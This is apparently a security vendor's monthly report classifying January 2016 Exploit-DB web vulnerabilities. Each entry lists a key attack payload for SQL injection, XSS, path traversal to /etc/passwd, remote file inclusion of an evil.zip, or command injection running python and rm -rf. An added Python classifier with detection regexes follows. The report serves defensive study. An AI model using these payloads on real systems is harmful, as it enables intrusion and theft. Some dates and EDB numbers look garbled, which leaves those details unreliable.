EDB Analysis Report (2016.01) 2016.01.01 ~ 2016.01.31
Information on the vulnerabilities published on Exploit-DB (http://exploit-db.com), classified by vulnerability type.

Summary of analysis (prepared by: Penta Security Systems, Security Assessment Team)

Our analysis of the Exploit-DB entries published in January 2016 shows that SQL Injection accounted for the largest number of reported vulnerabilities. In terms of attack difficulty, most of the analysed SQL Injection attacks were low-difficulty attacks that use a query which simply tests whether the injection succeeds; in terms of risk, however, all of them were high-risk attacks. Administrators running the affected software should apply security patches and secure coding that enforce stricter input validation in the target modules and plugins, so that they are not exposed to SQL Injection. Apart from SQL Injection, vulnerabilities involving Code Injection have recently been appearing on a regular basis. PHP Code Injection is a comparatively lower-risk class of vulnerability than SQL Injection and Command Injection, but because a great many websites are still written in PHP, those sites can easily be exposed to Code Injection. As with SQL Injection, user input must be strictly validated so that malicious code cannot be executed through PHP Code Injection.

1. Number of reports by vulnerability type

Vulnerability type | Reports
LFI                | 1
Command Injection  | 1
Code Injection     | 1
RFI                | 2
XSS                | 8
SQL Injection      | 15
Total              | 28

[Chart: number of reports by vulnerability type]

2. Classification by risk level
(the level labels of the two rows did not survive extraction; rows are given in the source's order)

Risk level | Reports | Percentage
-          | 7       | 25.00%
-          | 21      | 75.00%
Total      | 28      | 100.00%

[Chart: classification by risk level]

3. Reports by attack difficulty
(only the label 하 (Low) survived extraction)

Attack difficulty | Reports | Percentage
-                 | 2       | 7.14%
-                 | 4       | 14.29%
Low (하)          | 22      | 78.57%
Total             | 28      | 100.00%

[Chart: reports by attack difficulty]

4. Vulnerabilities by major software

Software name    | Reports
-                | 3
CMS              | -
Forum            | -
Ramui webblog    | -
SeaWell Networks | 1
Total            | 8

[Chart: vulnerabilities by major software]
** Vulnerability details by major software (5 or more reports)

Columns in the source table: Date | EDB No. | Vulnerability type | Attack difficulty | Attack risk | Vulnerability name | Key attack code | Target program | Target environment | WAPPLES policy.
Cells that are blank in the source or did not survive extraction are shown as "-"; attack difficulty is given only where the source legibly reads 하 (Low). EDB numbers and version strings are reproduced as printed.

[1] 2016-01-02 | EDB 39150 | SQL Injection | Difficulty: Low | Risk: -
    Name: - software_add_license.php SQL Injection vulnerability
    Key attack code: /software_add_license.php?id=1%20and%201=1--
    Target program: - | Target environment: - | WAPPLES policy: -

[2] 2016-01-02 | EDB 39150 | SQL Injection | Difficulty: Low | Risk: -
    Name: - delete_system.php SQL Injection vulnerability
    Key attack code: /delete_system.php?pc=1%20and%201=1--
    Target program: - | Target environment: - | WAPPLES policy: -

[3] 2016-01-02 | EDB 39150 | SQL Injection | Difficulty: Low | Risk: -
    Name: - list_viewdef_software_for_system.php SQL Injection vulnerability
    Key attack code: /list_viewdef_software_for_system.php?pc=1%20and%201=1--
    Target program: - | Target environment: - | WAPPLES policy: -

[4] 2015-01-02 | EDB 39150 | SQL Injection | Difficulty: Low | Risk: -
    Name: - system_export.php SQL Injection vulnerability
    Key attack code: /system_export.php?pc=1%20and%201=1--
    Target program: - | Target environment: - | WAPPLES policy: -

[5] 2016-01-05 | EDB 39171 | XSS | Difficulty: Low | Risk: -
    Name: 1.1.010 - logincheck.php XSS vulnerability
    Key attack code: POST /phpipam/site/login/logincheck.php HTTP/1.1
                     ipamusername=<script>alert("rxss01")</script>&ipampassword=xxx
    Target program: 1.1.010 | Target environment: - | WAPPLES policy: -

[6] 2016-01-05 | EDB 39171 | XSS | Difficulty: Low | Risk: -
    Name: 1.1.010 - logincheck.php XSS vulnerability
    Key attack code: POST /phpipam/site/login/logincheck.php HTTP/1.1
                     ipamusername=<script>alert("rxss01")</script>&ipampassword=xxx
    Target program: 1.1.010 | Target environment: - | WAPPLES policy: -

[7] 2016-01-05 | EDB 39168 | SQL Injection | Difficulty: Low | Risk: -
    Name: - manage-profile.php SQL Injection vulnerability
    Key attack code: POST /manage-profile.php HTTP/1.1
                     email=1' and 1=1--
    Target program: - | Target environment: - | WAPPLES policy: -

[8] 2016-01-05 | EDB 39168 | SQL Injection | Difficulty: Low | Risk: -
    Name: - registeracc.php SQL Injection vulnerability
    Key attack code: POST /registeracc.php HTTP/1.1
                     email=tester%40wics.com' or updatexml(,concat(0x7e,(version())),0) or'
    Target program: - | Target environment: - | WAPPLES policy: -

[9] 2016-01-05 | EDB 39168 | XSS | Difficulty: Low | Risk: -
    Name: - manage-profile.php XSS vulnerability
    Key attack code: POST /manage-profile.php HTTP/1.1
                     firstname=wics&lastname=wics&email=<script>alert(document.location)</script>&password=admin&confirmpassword=admin&update=update+profile
    Target program: - | Target environment: - | WAPPLES policy: -

[10] 2016-01-05 | EDB 39168 | XSS | Difficulty: Low | Risk: -
    Name: - registeracc.php XSS vulnerability
    Key attack code: POST /registeracc.php HTTP/1.1
                     firstname=wics&lastname=wics&email=<script>alert(1);</script>&password=admin&confirmpassword=admin&update=update+profile
    Target program: - | Target environment: - | WAPPLES policy: -

[11] 2016-01-08 | EDB 390 | XSS | Difficulty: Low | Risk: -
    Name: WP Symposium Pro Social Network Plugin 15.1 - wps_usermeta_shortcodes.php XSS vulnerability
    Key attack code: POST /wps_usermeta_shortcodes.php HTTP/1.1
                     wpspro_country="><script>alert("1")</script><"
    Target program: WP Symposium Pro Social Network Plugin 15.1 | Target environment: WP Symposium Pro Social Network Plugin 15.1 | WAPPLES policy: -

[12] 2016-01-1 | EDB 393 | Code Injection | Difficulty: Low | Risk: -
    Name: NMS <= 5.3.6.0 - kill.php Code Injection vulnerability
    Key attack code: POST /doms/discoveryqueue/kill.php HTTP/1.1
                     pids[]=echo phpinfo();
    Target program: NMS <= 5.3.6.0 | Target environment: NMS <= 5.3.6.0 | WAPPLES policy: not detected

[13] 2016-01-1 | EDB 393 | Command Injection | Difficulty: - | Risk: -
    Name: NMS <= 5.3.6.0 - kill.php Command Injection vulnerability
    Key attack code: POST /doms/discoveryqueue/kill.php HTTP/1.1
                     pids[]=python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5
    Target program: NMS <= 5.3.6.0 | Target environment: NMS <= 5.3.6.0 | WAPPLES policy: Stealth Commanding - detection of external program execution attempts

[14] 2016-01-15 | EDB 396 | SQL Injection | Difficulty: - | Risk: -
    Name: .xls Bitrix Module 6.5. - _xls_import.php SQL Injection vulnerability
    Key attack code: /bitrix/admin/_xls_import.php?del_prof_real=1&xls_profile=%27%20or%201=(select%20load_file(concAT(CHAR(9),CHAR(9),(select%20version()),CHAR(6),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(11),CHAR(6),CHAR(99),CHAR(111),CHAR(109),CHAR(9),CHAR(10),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(11))))+--+
    Target program: .xls Bitrix Module 6.5. | Target environment: .xls Bitrix Module 6.5. | WAPPLES policy: -

[15] 2016-01-15 | EDB 396 | SQL Injection | Difficulty: - | Risk: -
    Name: .xls Bitrix Module 6.5. - _xls_import_step_.php SQL Injection vulnerability
    Key attack code: /admin/_xls_import_step_.php?save_profile=y&make_translit_code=y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(select%20load_file(concat(char(9),char(9),(select%20version()),CHAR(6),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(11),CHAR(6),CHAR(99),CHAR(111),CHAR(109),CHAR(9),CHAR(10),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(11))))%29+--+&xls_iblock_section_id=0&xls_identify=0&firstrow=0&titlerow=0&firstcolumn=0&highestcolumn=0&xls_glOBALS=0&sku_iblock_id=1&cml_link_code=1&xls_iblock_section_id_new=0
    Target program: .xls Bitrix Module 6.5. | Target environment: .xls Bitrix Module 6.5. | WAPPLES policy: -

[16] 2016-01-18 | EDB 3966 | LFI | Difficulty: Low | Risk: -
    Name: SeaWell Networks Spectrum - configure_manage.php LFI vulnerability
    Key attack code: /configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd
    Target program: SeaWell Networks | Target environment: SeaWell Networks Spectrum | WAPPLES policy: Stealth Commanding - user-defined - relative path detection

[17] 2016-01-18 | EDB 3963 | RFI | Difficulty: Low | Risk: -
    Name: Forum 1.0.9 - index.php RFI vulnerability
    Key attack code: POST /index.php?act=admin&adact=skin&seadact=import HTTP/1.1
                     folderpath=../&importtype=&weburl=http://hyp3rlinx.altervista.org/evil.zip&filepath=../&uploadtheme=&importskin=import
    Target program: Forum | Target environment: Forum 1.0.9 | WAPPLES policy: Include Injection - file include detection

[18] 2016-01-18 | EDB 396 | XSS | Difficulty: Low | Risk: -
    Name: Forum 1.0.9 - index.php XSS vulnerability
    Key attack code: POST /index.php?act=admin&adact=skin&seadact=import HTTP/1.1
                     fredirect="/><script>alert("xss hyp3rlinx \n\n" + document.cookie)</script>
    Target program: Forum | Target environment: Forum 1.0.9 | WAPPLES policy: -

[19] 2016-01-25 | EDB 39309 | SQL Injection | Difficulty: - | Risk: -
    Name: Booking Calendar Contact Form Plugin <=1.1.3 - admin-ajax.php SQL Injection vulnerability
    Key attack code: /wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_check_ipn_verification&cpabc_ipncheck=1&itemnumber=(select * FROM (SELECT(SLEEP(5)))Qmyx)
    Target program: Booking Calendar Contact Form Plugin <=1.1.3 | Target environment: - | WAPPLES policy: -

[20] 2016-01-27 | EDB 393 | XSS | Difficulty: Low | Risk: -
    Name: WordPress Booking Calendar Contact Form <=1.1. - admin.php XSS vulnerability
    Key attack code: /wp-admin/admin.php?page=cpabc_appointments&ac=st&chs=utf-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ics=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&scr=1
    Target program: WordPress Booking Calendar Contact Form <=1.1. | Target environment: - | WAPPLES policy: Cross Site Scripting - user-defined - image tag

[21] 2016-01-27 | EDB 39339 | SQL Injection | Difficulty: - | Risk: -
    Name: jquery CMS. - gallery1.php SQL Injection vulnerability
    Key attack code: /user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+
    Target program: CMS | Target environment: jquery CMS. | WAPPLES policy: -

[22] 2016-01-27 | EDB 39339 | XSS | Difficulty: Low | Risk: -
    Name: jquery CMS. - gallery1.php XSS vulnerability
    Key attack code: /user/gallery1.php?g_name=%3cscript%3ealert%28%22XSS%22%29%3C/script%3E
    Target program: CMS | Target environment: jquery CMS. | WAPPLES policy: -

[23] 2016-01-28 | EDB 39355 | RFI | Difficulty: Low | Risk: -
    Name: Ramui Web Hosting Directory Script.0 - connection.php RFI vulnerability
    Key attack code: /gb/include/connection.php?root=http://test.com.index.php
    Target program: Ramui webblog | Target environment: Ramui Web Hosting Directory Script.0 | WAPPLES policy: Include Injection - file include detection

[24] 2016-01-28 | EDB 3935 | SQL Injection | Difficulty: Low | Risk: -
    Name: Ramui Forum Script 9.0 - page.php SQL Injection vulnerability
    Key attack code: /gb/include/page.php?pagename=1%20and%201=1--
    Target program: Ramui webblog | Target environment: Ramui Forum Script 9.0 | WAPPLES policy: -

[25] 2016-01-29 | EDB 39385 | SQL Injection | Difficulty: - | Risk: -
    Name: r58 - manage-files.php SQL Injection vulnerability
    Key attack code: POST /manage-files.php?client_id=1 HTTP/1.1
                     status=10' and 0 union select 0,1,'0) or 1 union select 0,1,concat(user,char(3),password),3,4,5,6,7,8,9 from tbl_users -- a',3,4,5,6,'7
    Target program: r58 | Target environment: r58 | WAPPLES policy: -

[26] 2016-01-29 | EDB 39385 | SQL Injection | Difficulty: Low | Risk: -
    Name: r58 - clients.php SQL Injection vulnerability
    Key attack code: POST /clients.php HTTP/1.1
                     status=1' and 1=1--
    Target program: r58 | Target environment: r58 | WAPPLES policy: -

[27] 2016-01-29 | EDB 39385 | SQL Injection | Difficulty: Low | Risk: -
    Name: r58 - rocess-zip-download.php SQL Injection vulnerability
    Key attack code: /rocess-zip-download.php?file=1%27%20and%201=1--%20
    Target program: r58 | Target environment: r58 | WAPPLES policy: -

[28] 2016-01-29 | EDB 39385 | SQL Injection | Difficulty: Low | Risk: -
    Name: r58 - home-log.php SQL Injection vulnerability
    Key attack code: /home-log.php?action=1%27%20and%201=1--%20
    Target program: r58 | Target environment: r58 | WAPPLES policy: -
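As an added example (written for this edition; it is not code from the report and not Penta Security's WAPPLES rule set), the following Python script shows the two ideas the report relies on: classifying each request into the vulnerability types used in the summary and per-type table, and the request-level detection that the WAPPLES policy column of the detail table refers to. It percent-decodes every request (repeatedly, so double-encoded input is not missed), matches it against one small signature set per class, and tallies the results the way section 1 does. The sample requests are constructed and modelled on the detail table; the signature patterns, function names and the example.invalid hostname are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed, deliberately small signature set for the six classes the report
# uses. Illustration only: not the WAPPLES policies, and easy to evade.
SIGNATURES = {
    "SQL Injection": [
        re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),           # truth-test queries (and 1=1--)
        re.compile(r"\bunion\s+(all\s+)?select\b", re.I),          # union-based extraction
        re.compile(r"\b(sleep|updatexml|load_file)\s*\(", re.I),   # time-/error-based, file read
    ],
    "XSS": [
        re.compile(r"<\s*script\b", re.I),                         # inline script tag
        re.compile(r"<\s*img\b[^>]*\bonerror\s*=", re.I),          # image tag with event handler
    ],
    "LFI": [re.compile(r"(\.\./){2,}")],                           # repeated parent-directory traversal
    "RFI": [re.compile(r"=\s*https?://", re.I)],                   # parameter pointing at a remote file
    "Command Injection": [re.compile(r"(;|\|\||&&)\s*(rm|python|sh|bash|wget|curl)\b")],
    "Code Injection": [re.compile(r"\b(phpinfo|eval|system|passthru)\s*\(", re.I)],
}


def normalize(raw: str) -> str:
    """Percent-decode up to three times so that double-encoded payloads surface too."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(request: str) -> list:
    """Return the sorted list of classes whose signatures match the decoded request."""
    text = normalize(request)
    return sorted(name for name, patterns in SIGNATURES.items()
                  if any(p.search(text) for p in patterns))


def summarize(requests) -> dict:
    """Count matches per class, the way the report's per-type table does."""
    counts = {name: 0 for name in SIGNATURES}
    counts["(no match)"] = 0
    for request in requests:
        hits = classify(request)
        if not hits:
            counts["(no match)"] += 1
        for hit in hits:
            counts[hit] += 1
    return counts


# Constructed request lines modelled on the detail table (request line, then the
# body after a blank line for POSTs). The last entry is a benign request.
SAMPLE_REQUESTS = [
    "GET /delete_system.php?pc=1%20and%201=1-- HTTP/1.1",
    "POST /manage-profile.php HTTP/1.1\r\n\r\nemail=1' and 1=1--",
    "GET /user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+ HTTP/1.1",
    "GET /wp-admin/admin-ajax.php?action=cpabc_appointments_check_ipn_verification&itemnumber=(select%20*%20FROM%20(SELECT(SLEEP(5)))Qmyx) HTTP/1.1",
    'POST /phpipam/site/login/logincheck.php HTTP/1.1\r\n\r\nipamusername=<script>alert("rxss01")</script>&ipampassword=xxx',
    "GET /wp-admin/admin.php?page=cpabc_appointments&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1",
    "GET /configure_manage.php?action=download_config&file=../../../../../../etc/passwd HTTP/1.1",
    "GET /gb/include/connection.php?root=http://example.invalid/index.php HTTP/1.1",
    "POST /doms/discoveryqueue/kill.php HTTP/1.1\r\n\r\npids[]=echo phpinfo();",
    "POST /doms/discoveryqueue/kill.php HTTP/1.1\r\n\r\npids[]=python /tmp/sess_x; rm -rf /tmp/sess_x",
    "GET /index.php?page=home HTTP/1.1",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(f"{request.splitlines()[0]:<80} -> {classify(request) or ['-']}")
    for name, count in summarize(SAMPLE_REQUESTS).items():
        print(f"{name:<20} {count}")
```

Run directly, it prints the class of each sample request and a tally that mirrors the per-type table. Signatures like these are a last line of defence: the Booking Calendar and jquery CMS entries already show the same payload shapes arriving in different encodings, and a policy that is "not detected" against the NMS code-injection entry shows the gap such matching leaves. The stricter input validation and secure coding the summary calls for remain the primary fix.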